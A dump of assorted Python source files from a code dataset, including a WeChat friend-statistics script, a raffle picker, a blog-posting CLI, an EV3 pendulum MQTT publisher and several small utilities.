\n\t\t_MILDEW.__init__(self)\n\t\tself.name = \"MILDEWED\"\n\t\tself.specie = 'nouns'\n\t\tself.basic = \"mildew\"\n\t\tself.jsondata = {}\n","sub_path":"xai/brain/wordbase/nouns/_mildewed.py","file_name":"_mildewed.py","file_ext":"py","file_size_in_byte":240,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"48"} +{"seq_id":"248902581","text":"import itchat\nimport matplotlib.pyplot as plt\nfrom collections import Counter\nimport re\nimport jieba\nfrom wordcloud import WordCloud, ImageColorGenerator\nfrom scipy.misc import imread\nimport pandas as pd\nimport os\nimport jieba.analyse\nimport numpy as np\nfrom PIL import Image\nfrom snownlp import SnowNLP\nimport csv\n\nprint(os.getcwd()) #获取当前工作路径\nos.chdir(r'C:\\Users\\Lenovo\\Desktop')\n# 可视化的中文处理\nplt.rcParams['font.sans-serif'] = 'SimHei'\nplt.rcParams['axes.unicode_minus'] = False\nplt.style.use('ggplot')\n\n# # 登陆微信\n# itchat.auto_login(hotReload=True)\n#\n# # 获取自己的好友列表\n# friends = itchat.get_friends(update=True)\n# # print(friends)\n#\n# # 好友总数, 第一个是自己\n# total = len(friends[1:])\n# print ('好友总数:', total)\n#\n# # 查看好友男友比例\n# male = female = other = 0\n# for friend in friends[1:]:\n# sex = friend['Sex']\n# if sex == 1:\n# male += 1\n# elif sex == 2:\n# female += 1\n# else:\n# other += 1\n# print(male)\n# print(female)\n# print(other)\n# sexes = list()\n# sexes.append(float(male) * 100 / total)\n# sexes.append(float(female) * 100 / total)\n# sexes.append(float(other) * 100 / total)\n#\n# print ('男性好友: %-.2f%%' % sexes[0])\n# print ('女性好友: %-.2f%%' % sexes[1])\n# print ('不明身份好友: %-.2f%%' % sexes[2])\n#\n# #draw(sexes, ['male', 'female', 'other'], 'Gender', 'Proportion', \"Gender's proportion of my friends\", type=0)\n#\n# all_information=[]\n# NickNames=[]\n# RemarkNames=[]\n# Sexs=[]\n# Provinces=[]\n# Citys=[]\n# Signatures=[]\n# for friend in friends:\n# NickNames.append(friend['NickName'])\n# RemarkNames.append(friend['RemarkName'])\n# Sexs.append(friend['Sex'])\n# 
Provinces.append(friend['Province'])\n# Citys.append(friend['City'])\n# Signatures.append(friend['Signature'])\n# all_information=[NickNames,RemarkNames,Sexs,Provinces,Citys,Signatures]\n# test = pd.DataFrame(all_information).T\n# # test.rename(columns={0:'NickNames',1:'Sexs',2:'Provinces',3:'Citys',4:'Signatures'}, inplace=True)\n# test.columns=['NickName','RemarkName','Sex','Province','City','Signature']\n# # print(test.info())\n# test.to_csv('weixin.csv', encoding='utf_8_sig',index=False)\n\n# DataFrame.to_csv(path_or_buf=None, sep=', ', na_rep='', float_format=None, columns=None,\n# header=True,index=True, index_label=None, mode='w', encoding=None, compression=None,\n# quoting=None, quotechar='\"',line_terminator='\\n', chunksize=None, tupleize_cols=None,\n# date_format=None, doublequote=True,escapechar=None, decimal='.')\n\n\n\n\n\n\n\n# signatures = list()\n# provinces = list()\n# cities = list()\n# 过滤掉签名中的冗余字符\n# pattern = re.compile('<[^>]+>')\n# for friend in friends:\n# if friend['Signature']:\n# signature = pattern.sub('', friend['Signature']).strip().replace('&', '')\n# signatures.append(signature)\n# provinces.append(friend['Province'] if friend['City'] else 'NULL')\n# cities.append(friend['City'] if friend['City'] else 'NULL')\n#\n#\n# # 绘制好友省份柱状图\n# pro = sorted(Counter(provinces).most_common(10), key=lambda d: -d[1])\n# label, num = zip(*pro)\n# #draw(num, label, 'Provinces', 'nums', 'Province distribute of my friends')\n#\n# # 绘制好友城市柱状图\n# cit = sorted(Counter(cities).most_common(10), key=lambda d: -d[1])\n# label, num = zip(*cit)\n# #draw(num, label, 'Cities', 'nums', 'City distribute of my friends')\n\n\n\n\n\n\n\ndef analyseSignature(friends):\n signatures = ''\n emotions = []\n pattern = re.compile(\"1f\\d.+\")\n for friend in friends:\n signature = friend['Signature']\n if(signature != None):\n signature = signature.strip().replace('span', '').replace('class', '').replace('emoji', '')\n signature = re.sub(pattern,'',signature)\n if(len(signature)>0):\n nlp = SnowNLP(signature)\n # print(nlp)\n # print(nlp.words) 分词\n # print(nlp.sentiments) 计算正向概率 权值\n # print(nlp.tags) 对词的属性进行分类\n # print(nlp.pinyin) #汉转拼音\n # print(nlp.tf) # 词频\n # print(nlp.idf) # 逆向文件频率\n emotions.append(nlp.sentiments)\n signatures += ' '.join(jieba.analyse.extract_tags(signature,5))\n with open('signatures.txt','wt',encoding='utf-8') as file:\n file.write(signatures)\n\n # Sinature WordCloud\n # back_coloring = np.array(Image.open('heart.jpg'))\n wordcloud = WordCloud(\n font_path='simfang.ttf',\n background_color=\"white\",\n max_words=1200,\n # mask=back_coloring,\n max_font_size=75,\n random_state=45,\n width=960,\n height=720,\n margin=15\n )\n\n wordcloud.generate(signatures)\n plt.imshow(wordcloud)\n plt.axis(\"off\")\n plt.show()\n wordcloud.to_file('signatures.jpg')\n\n # Signature Emotional Judgment\n count_good = len(list(filter(lambda x:x>0.66,emotions)))\n # print(list(filter(lambda x:x>0.66,emotions)))\n count_normal = len(list(filter(lambda x:x>=0.33 and x<=0.66,emotions)))\n count_bad = len(list(filter(lambda x:x<0.33,emotions)))\n labels = [u'负面消极',u'中性',u'正面积极']\n values = (count_bad,count_normal,count_good)\n plt.xlabel(u'情感判断')\n plt.ylabel(u'频数')\n plt.xticks(range(3),labels)\n plt.legend(loc='upper right',)\n plt.bar(range(3), values, color = 'rgb')\n plt.title('杨海��微信好友签名信息情感分析')\n plt.show()\n\n\ndef analyseSex(firends):\n sexs = list(map(lambda x:x['Sex'],friends[1:]))\n counts = list(map(lambda x:x[1],Counter(sexs).items()))\n labels = ['Unknow','Male','Female']\n colors 
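# One caveat in `analyseSex` here: `Counter(sexs).items()` yields counts in
# first-seen order, not in the fixed 0/1/2 order that the labels
# ['Unknow','Male','Female'] assume. A deterministic alternative:
counts = [sexs.count(code) for code in (0, 1, 2)]  # Unknow, Male, Female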
= ['red','yellowgreen','lightskyblue']\n plt.figure(figsize=(8,5), dpi=80)\n plt.axes(aspect=1)\n plt.pie(counts, #性别统计结果\n labels=labels, #性别展示标签\n colors=colors, #饼图区域配色\n labeldistance = 1.1, #标签距离圆点距离\n autopct = '%3.1f%%', #饼图区域文本格式\n shadow = False, #饼图是否显示阴影\n startangle = 90, #饼图起始角度\n pctdistance = 0.6 #饼图区域文本距离圆点距离\n )\n plt.legend(loc='upper right',)\n plt.title(u'%s' % friends[0]['NickName'])\n plt.show()\n\n\ndef analyseLocation(friends):\n headers = ['NickName','RemarkName','Sex','Province','City','Signature']\n with open('location.csv','w',encoding=\"utf_8_sig\",newline='') as csvFile:\n writer = csv.DictWriter(csvFile, headers)\n writer.writeheader()\n for friend in friends[1:]:\n row = {}\n row['NickName'] = friend['NickName']\n row['RemarkName'] = friend['RemarkName']\n row['Sex'] = friend['Sex']\n row['Province'] = friend['Province']\n row['City'] = friend['City']\n row['Signature'] = friend['Signature']\n print(row)\n writer.writerow(row)\n\n# 登陆微信\nitchat.auto_login(hotReload=True)\n# 获取自己的好友列表\nfriends = itchat.get_friends(update=True)\n# 好友总数, 第一个是自己\n\ntotal = len(friends[1:])\nprint ('好友总数:', total)\n\n# analyseSignature(friends)\n# analyseSex(friends)\nanalyseLocation(friends)","sub_path":"321.py","file_name":"321.py","file_ext":"py","file_size_in_byte":7313,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"21"} +{"seq_id":"157165246","text":"\"\"\"xlrd example\"\"\"\nimport xlrd\n\ndef open_excel(file='./py/HPE.PerfCore.TruClientFootprintTestData.xls'):\n \"\"\"open excel file\"\"\"\n try:\n data = xlrd.open_workbook(file)\n return data\n except Exception:\n print('exception throw')\n\ndef go_through_excel(file='./py/HPE.PerfCore.TruClientFootprintTestData.xls'):\n \"\"\"print rows in excel one by one\"\"\"\n data = open_excel(file)\n table = data.sheet_by_name('Footprint')\n for i in range(table.nrows):\n print(table.row_values(i))\n\ngo_through_excel()\n","sub_path":"py/xlrd_operate.py","file_name":"xlrd_operate.py","file_ext":"py","file_size_in_byte":536,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"21"} +{"seq_id":"115849407","text":"\"\"\"Read customer data from file and run a raffle.\"\"\"\n\nfrom random import choice\n\n\nclass Customer(object):\n \"\"\"A customer at Ubermelon.\"\"\"\n\n def __init__(self, name, email, street, city, zipcode):\n self.name = name\n self.email = email\n self.street = street\n self.city = city\n self.zipcode = zipcode\n\n\ndef get_customers_from_file(customer_file_path):\n \"\"\"Read customer file and return list of customer objects.\n\n Read file at customer_file_path and create a customer object\n containing customer information.\n \"\"\"\n\n customers = []\n\n customer_file = open(customer_file_path)\n\n # Process a file like:\n #\n # customer-name | email | street | city | zipcode\n\n for line in customer_file:\n customer_data = line.strip().split(\"|\")\n name, email, street, city, zipcode = customer_data\n\n new_customer = Customer(name, email, street, city, zipcode)\n customers.append(new_customer)\n\n return customers\n\n\ndef pick_winner(customers):\n \"\"\"Choose a random winner from list of customers.\"\"\"\n\n chosen_customer = choice(customers)\n\n print(\"Tell {name} at {email} that they've won\".format(\n name=chosen_customer.name,\n email=chosen_customer.email\n ))\n\n\ndef run_raffle():\n \"\"\"Run the weekly raffle.\"\"\"\n\n customers = get_customers_from_file(\"customers.txt\")\n pick_winner(customers)\n\nif __name__ == 
'__main__':\n    run_raffle()","sub_path":"melon-raffle/raffle.py","file_name":"raffle.py","file_ext":"py","file_size_in_byte":1442,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"21"} +{"seq_id":"113668326","text":"from tistorycmd import *\nimport mistune\n\nUSAGE = \"\"\"USAGE:\n    # show blog information\n    tistorycmd info\n\n    # list categories\n    tistorycmd category\n\n    # write a post (also used when editing everything)\n    tistorycmd post <title> <content|file path> <tags>\n    \n    # update the content only\n    tistorycmd update <content|file path>\n    \"\"\"\n\n\ndef main():\n    if len(sys.argv) < 2:\n        print(USAGE, file=sys.stderr)\n        return\n\n    auth = Auth()  # class handling login, OAuth and tokens\n    blog = Blog()  # class handling posting and other blog operations\n    command = sys.argv[1]  # subcommand\n    if command == 'info':\n        blog.info()\n    elif command == 'category':\n        blog.category_list()\n    elif command == 'post':\n        if len(sys.argv) < 4:\n            print(USAGE, file=sys.stderr)\n            return\n\n        cont_path = os.path.abspath(sys.argv[3])  # path of the content file\n        history_file = os.path.dirname(cont_path) + os.sep + '.tistory'  # file with the previous posting history\n\n        title = sys.argv[2]  # title\n        category = (len(sys.argv) > 4) and sys.argv[4] or ''  # category (optional)\n        tags = (len(sys.argv) > 5) and sys.argv[5] or ''  # tags (optional)\n        content_md = \"\"  # file content to upload, as markdown\n        overwrite_md = \"\"  # content to write back (prevents re-uploading images every time)\n        \n        # upload files when images are present\n        with open(cont_path, 'r', encoding='UTF8') as fp:\n            for line in fp:\n                name_grp = re.search('(\\\!\\\[\\\s*)(\\\w+)(\\\s*\\\])(\\\(\\\s*)([^http:\\\/\\\/].*)(\\\s*\\\))', line)  # check for an image pattern (note: [^http:\\\/\\\/] is a character class, not a negative lookahead)\n                if (name_grp):\n                    content_md += blog.file_upload(line, os.path.dirname(cont_path))\n                    overwrite_md += blog.file_upload(line, os.path.dirname(cont_path))\n                else:\n                    content_md += line\n                    overwrite_md += line\n\n        # overwrite the file content (prevents re-uploading images every time)\n        if os.path.exists(cont_path):\n            with open(cont_path, 'w', encoding='utf-8') as make_file:\n                make_file.write(overwrite_md)\n\n        content_html = mistune.markdown(content_md)  # file content to upload, as HTML\n        if(os.path.isfile(history_file)):\n            # edit the post\n            blog.post_edit(history_file, title, content_html, category, tags)\n        else:\n            # write a new post\n            blog.post_write(history_file, title, content_html, category, tags)\n    elif command == 'update':\n        if not sys.argv[2]:\n            print(USAGE, file=sys.stderr)\n            return\n\n        cont_path = os.path.abspath(sys.argv[2])  # path of the content file\n        history_file = os.path.dirname(cont_path) + os.sep + '.tistory'  # file with the previous posting history\n\n        # when there is no history file\n        if not os.path.exists(history_file):\n            print(\".tistory file not found.\")\n            return\n\n        # read the history file\n        with open(history_file, 'r') as f:\n            history = json.load(f)\n        postId = (\"postId\" in history) and history['postId'] or ''\n        title = (\"title\" in history) and history['title'] or ''  # title\n        category = (\"category\" in history) and history['category'] or ''  # category (optional)\n\n        # when the postId value is missing\n        if not postId:\n            print('Please delete the .history file and try again.')\n\n        post_info = blog.post_read(postId)\n        if post_info:\n            title = post_info[\"title\"]  # title\n            category = post_info[\"categoryId\"]  # category (optional)\n            content_md = \"\"  # file content to upload, as markdown\n            overwrite_md = \"\"  # content to write back (prevents re-uploading images every time)\n\n            # upload files when images are present\n            with open(cont_path, 'r', encoding='UTF8') as fp:\n                for line in fp:\n                    name_grp = re.search('(\\\!\\\[\\\s*)(\\\w+)(\\\s*\\\])(\\\(\\\s*)([^http:\\\/\\\/].*)(\\\s*\\\))', line)  # check for an image pattern\n                    if (name_grp):\n                        content_md += blog.file_upload(line, os.path.dirname(cont_path))\n                        overwrite_md += blog.file_upload(line, os.path.dirname(cont_path))\n                    else:\n                        content_md += line\n                        overwrite_md += line\n\n            # overwrite the file content (prevents re-uploading images every time)\n            if os.path.exists(cont_path):\n                with open(cont_path, 'w', encoding='utf-8') as 
make_file:\n                    make_file.write(overwrite_md)\n\n            content_html = mistune.markdown(content_md)  # file content to upload, as HTML\n\n            blog.contents_update(postId, title, content_html, category)\n    else:\n        print(USAGE, file=sys.stderr)\n        return\n\n\nmain()","sub_path":"main_test.py","file_name":"main_test.py","file_ext":"py","file_size_in_byte":4941,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"21"} +{"seq_id":"104026415","text":"import paho.mqtt.client as mqtt\nimport time\nfrom datetime import datetime\nimport ev3dev.ev3 as ev3\nfrom smbus import SMBus\nimport threading\n\nMQTT_SERVER = '192.168.137.10'\n\nMQTT_PENDULUM_STATE = 'pendulum_state_info'\n\nMODE_NORMAL = 0x00\nMODE_CALIBRATE = 0x43\nMODE_RESET = 0x52\n\nself_pendulum = None\n\nauth = {}\nauth['username']=\"link\"\nauth['password']=\"0123\"\n\nclass HTAngle:\n    def __init__(self, bus_no, address):\n        self.bus = SMBus(bus_no)\n        self.address = address\n\n        self.angle = 0  # angle, degrees (0 - 359)\n        self.acc_angle = 0  # accumulated angle, degrees(-2147483648 - 2147483647)\n        self.rpm = 0  # rotations per minute (-1000 to 1000)\n\n        self.current_data1_bit = False\n        self.current_data2_bit = False\n        self.last_data1_bit = False\n        self.last_data2_bit = False\n\n        self.update()\n\n    def set_mode(self, mode):\n        self.bus.write_byte_data(self.address, 0x41, mode)\n\n    def get_mode(self):\n        return self.bus.read_byte_data(self.address, 0x41)\n\n    def reset(self):\n        # reset accumulated angle\n        self.set_mode(MODE_RESET)\n        time.sleep(0.1)\n\n        # calibrate angle\n        self.set_mode(MODE_CALIBRATE)\n        time.sleep(0.1)\n\n        self.update()\n\n    def update(self):\n        ########################################################################\n        ### * ERROR FILTERING! 
###\n        ###  (1) data = 0xff                                                 ###\n        ###  (2) the most significant bit of data[1] is flipped (data[0]'s MSB) ###\n        ###  (3) the most significant bit of data[2] is flipped               ###\n        ########################################################################\n        isError = True\n        while isError:\n            try:\n                data = self.bus.read_i2c_block_data(self.address, 0x41, 10)\n                # error filtering (1)\n                if data[1] == data[2] == data[3] == data[4] == data[5] == data[6] == data[7] == data[8] == 0xff:\n                    isError = True\n                    time.sleep(0.0001)\n                    continue\n                if data[2] == 0xff:\n                    isError = True\n                    time.sleep(0.0001)\n                    continue\n                # not error\n                else:\n                    isError = False\n            except (TypeError, OSError) as e:\n                print(\"update error: {0}\".format(str(e)))\n                isError = True\n                time.sleep(0.0001)\n\n        # error filtering (3)\n        self.current_data1_bit = True if data[1] & 0x20 == 0x20 else False\n        self.current_data2_bit = True if data[2] & 0x80 == 0x80 else False\n        if self.last_data1_bit and self.last_data2_bit:\n            if self.current_data1_bit and not self.current_data2_bit:\n                data[2] = data[2] | 0x80\n        self.last_data1_bit = self.current_data1_bit\n        self.last_data2_bit = self.current_data2_bit\n\n        # angle\n        self.angle = (data[1] & 0x7f) * 2 + (data[2] & 0x01) + ((data[2] & 0x80) << 1) # error filtering (2)\n\n        # accumulated angle\n        acc = (((data[3] & 0x7f) + (data[4] & 0x80)) * 0x1000000)\\\n            + (((data[4] & 0x7f) + (data[5] & 0x80)) * 0x10000)\\\n            + (((data[5] & 0x7f) + (data[6] & 0x80)) * 0x100)\\\n            + ((data[6] & 0x7f) + (data[7] & 0x80))\n\n        # convert to signed\n        if acc > 0x7fffffff:\n            self.acc_angle = (0x100000000 - acc) * (-1)\n        else:\n            self.acc_angle = acc\n\n        # rpm\n        rpm = (data[7] & 0x7f) * 0x100 + (data[8] & 0x7f) + (data[9] & 0x80)\n\n        # convert to signed\n        if rpm > 0x3fff:\n            self.rpm = (0x8000 - rpm) * (-1)\n        else:\n            self.rpm = rpm\n        return (self.angle, self.acc_angle, self.rpm)\n\n\nclass Pendulum:\n    def __init__(self, pub, hta):\n        global self_pendulum\n        self_pendulum = self\n\n        self.pub = pub\n        self.hta = hta\n\n        self.angle = 0\n\n        self.isReady = False\n\n    def timer_thread(self):\n        print()\n        print(\"***** update and pub pendulum angle started! 
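# The two "convert to signed" branches above are 32-bit and 15-bit
# two's-complement decodes; (0x100000000 - acc) * (-1) is simply
# acc - 0x100000000. A compact equivalent (a sketch, not used by the code):
def to_signed(value, bits):
    return value - (1 << bits) if value >= (1 << (bits - 1)) else value

assert to_signed(0xffffffff, 32) == -1
assert to_signed(0x4000, 15) == -16384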
(30 ms) *****\")\n while True:\n self.isReady = True\n # time.sleep(0.015)\n time.sleep(0.03)\n\n def update_and_pub_thread(self):\n while True:\n if self.isReady:\n self.isReady = False\n self.angle, _, _ = self.hta.update() # [angle, acc_angle, rpm]\n self.angle = str(self.angle - 180)\n self.pub.publish(\n topic=MQTT_PENDULUM_STATE,\n payload=self.angle + '|' + datetime.utcnow().strftime('%S.%f')[:-3]\n )\n else:\n time.sleep(0.0001)\n\n\nif __name__ == \"__main__\":\n while True:\n try:\n port = ev3.LegoPort(\"pistorms:BBS2\")\n if port.mode != \"i2c-thru\":\n port.mode = \"i2c-thru\"\n break\n except Exception as e:\n print(\"I/O exception: {0}\".format(str(e)))\n time.sleep(0.1)\n\n hta = HTAngle(1, 0x01)\n hta.reset()\n\n pub = mqtt.Client(client_id=\"pendulum_pub\", transport=\"TCP\")\n pub.username_pw_set(username=\"link\", password=\"0123\")\n pub.connect(MQTT_SERVER, 1883, 60)\n\n pendulum = Pendulum(pub, hta)\n\n timer_thread = threading.Thread(target=pendulum.timer_thread)\n update_and_pub_thread = threading.Thread(target=pendulum.update_and_pub_thread)\n\n timer_thread.daemon = True\n update_and_pub_thread.daemon = True\n\n timer_thread.start()\n update_and_pub_thread.start()\n\n while True:\n time.sleep(1)\n","sub_path":"05.EdgeX/edgex_client/pendulum/EV3_pub_timer.py","file_name":"EV3_pub_timer.py","file_ext":"py","file_size_in_byte":5788,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"21"} +{"seq_id":"581493831","text":"def rgb2hex(C,g=None,b=None):\n if len(C)==3 :\n r=C[0]\n g=C[1]\n b=C[2]\n if r<1.1 and g<1.1 and b<1.1:\n r=r*255\n g=g*255\n b=b*255\n \n return '#%02X%02X%02X' % (r,g,b)\n\n\ndef fColrs_hex(*args):\n return rgb2hex(fColrs(*args))\n\ndef fColrs(i=-1,n=-1,bBW=True):\n # Possible calls\n# M=fColrs() : returns a nx3 matrix of RBG colors\n# C=fColrs(i) : cycle through colors, modulo the number of color\n# G=fColrs(i,n) : return a grey color (out of n), where i=1 is black\n# % Thrid argument add a switch possibility between black and white or colors:\n# % G=fColrs(i,n,1) : return a grey color (out of n), where i=1 is black\n# % G=fColrs(i,n,0) : cycle through colors\n import numpy as np\n# \n MathematicaBlue = np.array([63,63,153])/255. ; \n MathematicaRed = np.array([153,61,113])/255. ; \n MathematicaGreen = np.array([61,153,86])/255. ; \n MathematicaYellow = np.array([152,140,61])/255. ; \n MathematicaLightBlue = np.array([159,159,204 ])/255. ; \n MathematicaLightRed = np.array([204,158,184 ])/255. ; \n MathematicaLightGreen = np.array([158,204,170 ])/255. ; \n # \n ManuDarkBlue = np.array([0,0,0.7 ]) ; \n ManuDarkRed = np.array([138,42,93])/255. ; \n ManuDarkOrange = np.array([245,131,1])/255. ; \n ManuDarkOrange = np.array([198,106,1])/255. ; \n ManuLightOrange = np.array([255.,212,96])/255. 
; \n # \n Red = np.array([1,0,0]) ; \n Blue = np.array([0,0,1]) ; \n Green = np.array([0,0.6,0]) ; \n Yellow = np.array([0.8,0.8,0]); \n\n MatlabGreen = np.array([0,0.5,1 ] );\n MatlabCyan = np.array([0.0e+0 , 750.0e-03 , 750.0e-03 ] );\n MatlabMagenta = np.array([ 750.0e-03 , 0.0e+0 , 750.0e-03 ] );\n MatlabYellow = np.array([750.0e-03 , 750.0e-03 , 0.0e+0 ] );\n MatlabGrey = np.array([250.0e-03 , 250.0e-03 , 250.0e-03 ] );\n\n\n # Table of Color used\n mcolrs=np.array([\n MathematicaBlue,\n MathematicaGreen,\n ManuDarkRed,\n ManuDarkOrange,\n MathematicaLightBlue,\n MathematicaLightGreen,\n MathematicaLightRed,\n ManuLightOrange,\n Blue,\n Green,\n Red,\n Yellow,\n MatlabCyan,\n MatlabMagenta ]);\n # \n if i==-1:\n return mcolrs\n elif (i!=-1 and n==-1):\n return mcolrs[np.mod(i-1,len(mcolrs)),:];\n elif (i!=-1 and n!=-1):\n if bBW:\n if n==1:\n return [0,0,0]\n else:\n return [0.55,0.55,0.55]*(v-1)/(n-1); #grayscale\n else:\n return mcolrs[mod(i-1,len(mcolrs,1)),:];\n else:\n return mcolrs\n \n# \ndef test_colrs():\n\n #from ebra.plot import *\n from numpy import linspace,sin,pi\n from matplotlib import pyplot as plt\n\n x=linspace(0,2*pi,100);\n plt.figure()\n plt.title('fig_python')\n plt.grid()\n for i in range(30):\n plt.plot(x,sin(x)+i,'-',color=fColrs(i))\n plt.xlabel('x coordinate [m]')\n plt.ylabel('Velocity U_i [m/s]')\n plt.xlim([0,2*pi])\n\n plt.show()\nif __name__ == \"__main__\":\n test_colrs()\n","sub_path":"path/PythonPath/ebra/plot/colors.py","file_name":"colors.py","file_ext":"py","file_size_in_byte":3237,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"21"} +{"seq_id":"262888782","text":"import math\n\nclass Object:\n #this is a generic object: the player, a monster, an item, the stairs...\n #it's always represented by a character on screen.\n def __init__(self, x, y, char, name, blocks=False, fighter=None, ai=None, item=None):\n self.x = x\n self.y = y\n self.char = char\n self.name = name\n self.blocks = blocks\n self.fighter = fighter\n self.ai = ai\n self.item = item\n\n if self.fighter: # let the fighter component know who owns it\n self.fighter.owner = self\n\n if self.ai: # let the AI component know who owns it\n self.ai.owner = self\n\n if self.item: # let the Item component know who owns it\n self.item.owner = self\n\n def move(self, dx, dy, dungeon):\n #move by the given amount, if the destination is not blocked\n if not is_blocked(self.x + dx, self.y + dy, dungeon):\n self.x += dx\n self.y += dy\n\n def get(self, player):\n if (self.x, self.y) in player.fov_coords:\n return self\n\n def clear(self):\n del self\n\n def move_towards(self, target_x, target_y, dungeon):\n #vector from this object to the target, and distance\n dx = target_x - self.x\n dy = target_y - self.y\n distance = math.sqrt(dx ** 2 + dy ** 2)\n\n #normalize it to length 1 (preserving direction), then round it and\n #convert to integer so the movement is restricted to the map grid\n dx = int(round(dx / distance))\n dy = int(round(dy / distance))\n self.move(dx, dy, dungeon)\n\n def distance_to(self, other):\n #return the distance to another object\n dx = other.x - self.x\n dy = other.y - self.y\n return math.sqrt(dx ** 2 + dy ** 2)\n\n\ndef send_to_back(obj, objects):\n # make this object be drawn first, so all others appear above it if\n # they're in the same tile.\n\n objects.remove(obj)\n objects.insert(0, obj)\n\n\ndef is_blocked(x, y, dungeon):\n #first test the map tile\n if dungeon.map[x][y].blocked:\n return True\n\n #now check for any blocking 
objects\n for object in dungeon.objects:\n if object.blocks and object.x == x and object.y == y:\n return True\n\n return False","sub_path":"common/object.py","file_name":"object.py","file_ext":"py","file_size_in_byte":2273,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"21"} +{"seq_id":"15447485","text":"import sys\nfrom gomatic import GoCdConfigurator, HostRestClient, ExecTask\n\nconfigurator = GoCdConfigurator(HostRestClient(\"localhost:8153\"))\n\npipeline_name = sys.argv[1]\n\npipeline = configurator\\\n .ensure_pipeline_group(\"auto-created\")\\\n .find_pipeline(pipeline_name)\n\nfor stage in pipeline.stages()[1:]:\n pipeline.ensure_removal_of_stage(stage.name())\n\ncommands = open(\"commands.txt\").readlines()\nfor command in commands:\n command_name, thing_to_execute = command.strip().split('=')\n pipeline\\\n .ensure_stage(command_name)\\\n .ensure_job(command_name)\\\n .ensure_task(ExecTask(thing_to_execute.split(\" \")))\n\nconfigurator.save_updated_config()\n","sub_path":"bootstrap.py","file_name":"bootstrap.py","file_ext":"py","file_size_in_byte":678,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"21"} +{"seq_id":"566706544","text":"import sys\n\ndef incr_cntr(a , b):\n print(\"b \" , a)\n if len(a) >= 2:\n for i in range(len(a)-1):\n if a[i] == \"1\" and a[i+1] == \"1\":\n b += 1\n b = incr_cntr(a[i+2:] , b)\n break\n return b\n\n\ndec_num = int(input().strip())\nbin_num = bin(dec_num)\nresult = 0\nresult = incr_cntr(list(bin_num), result)\nprint(\"result = \",result)\n","sub_path":"ConsecutiveOnes/main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":391,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"21"} +{"seq_id":"151955256","text":"import tables \nimport numpy as np \nimport pylab as pl\nimport glob\n\nclass DumsesSides:\n \"\"\" Extract data from the sides of DUMSES simulation \n Usage: data = DumsesSides(ispec, type=type)\n with:\n - ispec: index of the 'special' output\n - type : 'sequential', 'collective_hdf5' or 'collective_mpi' as for the 'store_sides' variable in DUMSES\n\n data is an object with:\n - data.side[a][i], with a in (x,y,z) and i in (1,2)\n each data.side[a][i] contains the 4 variables: rho, E, rhou & B\n\n Optional arguments:\n - filedir: path of the directory containing the 'special' directories\n - nbuf : number of ghost cells\"\"\"\n\n def __init__(self, ispec=1, filedir='./', nvar=8, nbuf=3, type='sequential'):\n self.ispec = ispec\n self.filedir = filedir\n if(type=='sequential'):\n # Define files to read and retrieve basic informations\n fsidex = fsideSeq(ispec=ispec, filedir=filedir, direction='x')\n fsidey = fsideSeq(ispec=ispec, filedir=filedir, direction='y')\n fsidez = fsideSeq(ispec=ispec, filedir=filedir, direction='z')\n self.npes = int(np.sqrt(fsidex.nsq*fsidey.nsq*fsidez.nsq))\n self.nxslice = self.npes/fsidex.nsq\n self.nyslice = self.npes/fsidey.nsq\n self.nzslice = self.npes/fsidez.nsq\n\n nxslice = self.nxslice \n nyslice = self.nyslice\n nzslice = self.nzslice\n \n # Retrieve color and key values in each direction to organize thread files\n colorx = []; colory = []; colorz = []\n keyx = []; keyy = []; keyz = []\n for mype in range(self.npes):\n colorx.append(mype%nxslice)\n colory.append((mype/(nxslice*nzslice))%nyslice)\n colorz.append((mype/nxslice)%nzslice)\n keyx.append(mype/nxslice)\n keyy.append(mype%(nxslice*nzslice))\n keyz.append(colory[mype]*nxslice \\\n + 
(mype-colorz[mype]*nxslice)%nxslice)\n\n tfx = tables.openFile(fsidex.listtop[0])\n self.ny = tfx.root.rho.shape[1] - 2*nbuf\n self.nz = tfx.root.rho.shape[0] - 2*nbuf\n tfx.close()\n tfy = tables.openFile(fsidey.listtop[0])\n self.nx = tfy.root.rho.shape[1] - 2*nbuf\n tfy.close()\n \n # Create sides in each direction\n self.sidex1 = sideSeq(fsidex.listtop, self.ny, self.nz \\\n , nyslice, nzslice, keyx, 'x', nbuf)\n self.sidex2 = sideSeq(fsidex.listbot, self.ny, self.nz \\\n , nyslice, nzslice, keyx, 'x', nbuf)\n self.sidey1 = sideSeq(fsidey.listtop, self.nx, self.nz \\\n , nxslice, nzslice, keyy, 'y', nbuf)\n self.sidey2 = sideSeq(fsidey.listbot, self.nx, self.nz \\\n , nxslice, nzslice, keyy, 'y', nbuf)\n self.sidez1 = sideSeq(fsidez.listtop, self.nx, self.ny \\\n , nxslice, nyslice, keyz, 'z', nbuf)\n self.sidez2 = sideSeq(fsidez.listbot, self.nx, self.ny \\\n , nxslice, nyslice, keyz, 'z', nbuf)\n \n elif(type=='collective_hdf5'):\n filerep = filedir + 'special_%06d/' %ispec\n fside = tables.openFile(filerep + 'sides.000000')\n\n # Retrieve basic informations\n self.nx = fside.root.para_int[0]\n self.ny = fside.root.para_int[1]\n self.nz = fside.root.para_int[2]\n self.nxslice = fside.root.para_int[3]\n self.nyslice = fside.root.para_int[4]\n self.nzslice = fside.root.para_int[5]\n self.dim = fside.root.para_int[0:3]\n self.slice = fside.root.para_int[3:6]\n \n nglob = self.dim*self.slice\n\n # Create sides in each direction\n self.sidex1 = sideColHDF(fside, nglob, side='x', nside=1, nbuf=nbuf)\n self.sidex2 = sideColHDF(fside, nglob, side='x', nside=2, nbuf=nbuf)\n self.sidey1 = sideColHDF(fside, nglob, side='y', nside=1, nbuf=nbuf)\n self.sidey2 = sideColHDF(fside, nglob, side='y', nside=2, nbuf=nbuf)\n self.sidez1 = sideColHDF(fside, nglob, side='z', nside=1, nbuf=nbuf)\n self.sidez2 = sideColHDF(fside, nglob, side='z', nside=2, nbuf=nbuf)\n\n fside.close()\n\n elif(type=='collective_mpi'):\n 